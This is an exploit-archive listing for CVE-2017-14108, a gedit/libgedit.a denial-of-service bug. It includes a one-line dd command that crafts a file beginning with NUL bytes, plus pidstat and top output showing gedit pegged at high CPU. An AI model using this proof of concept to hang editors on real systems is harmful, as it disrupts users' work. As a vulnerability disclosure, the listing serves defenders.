libgedit.a 3.22.1 Denial Of Service

libgedit.a 3.22.1 Denial Of Service: Posted Sep 4, 2017; Authored by Hosein Askari; libgedit.a versions 3.22.1 and below suffer from a denial of service vulnerability.; tags | exploit, denial of service; advisories | CVE-2017-14108; SHA-256 | cac7e3249daa80e7e6c5fee8123d3bb7156fe3aed36f5446e5a5caf356d6d9ac; Download | Favorite | View

libgedit.a 3.22.1 Denial Of Service


whom it may concern,
################

#Title: libgedit.a mishandeling NUL blocks in gedit(GNOME text editor) | Denial of service

#CVE: CVE-2017-14108

#CWE: CWE-400

#Exploit Author: Hosein Askari 

#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit

#Version : All Version (3.22.1 and older version)

#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)

#Date: 02-09-2017

#Category: Application

#Author Mail : hosein.askari@aol.com

#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) for a longtime via a file(less than 100KB) that begins with many '\0' characters.

###############

#sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt

#################

POC:

constantine@constantine:~$ pidstat -h -r -u -v -p 3107

Linux 4.4.0-93-generic (constantine) A A A  U+-U*/UdegU1/UdegU+- A A A  _i686_A A A  (2 CPU)

#A A A A A  TimeA A  UIDA A A A A A  PIDA A A  %usr %systemA  %guestA A  %waitA A A  %CPUA A  CPUA  minflt/sA  majflt/sA A A A  VSZA A A A  RSSA A  %MEM threadsA A  fd-nrA  Command

A 1504280041A  1000A A A A A  3107A A  16.43A A A  0.01A A A  0.00A A A  0.03A A  106.44A A A A  1A A A A  15.53A A A A A  0.00A  121296A A  38804A A  0.95A A A A A A  4A A A A A  18A  gedit

constantine@constantine:~$ top

A  PID USERA A A A A  PRA  NIA A A  VIRTA A A  RESA A A  SHR SA  %CPU %MEMA A A A  TIME+ COMMANDA A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A  

A 3107 constan+A  20A A  0A  128884A  38492A  28320 R 106.7A  0.9A A  0:17.76 gedit 

#########################
Best Regards

Hosein Askari

Contact : hosein.askari@aol.com

Top Authors In Last 30 Days

Red Hat 260 files
indoushka 124 files
Ubuntu 97 files
Gentoo 36 files
Debian 25 files
Jasper Nota 25 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,107)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,887)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,614)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,775)
UNIX (9,439)
UnixWare (187)
Windows (6,676)
Other

libgedit.a 3.22.1 Denial Of Service

libgedit.a 3.22.1 Denial Of Service

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

libgedit.a 3.22.1 Denial Of Service

Share This

libgedit.a 3.22.1 Denial Of Service

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems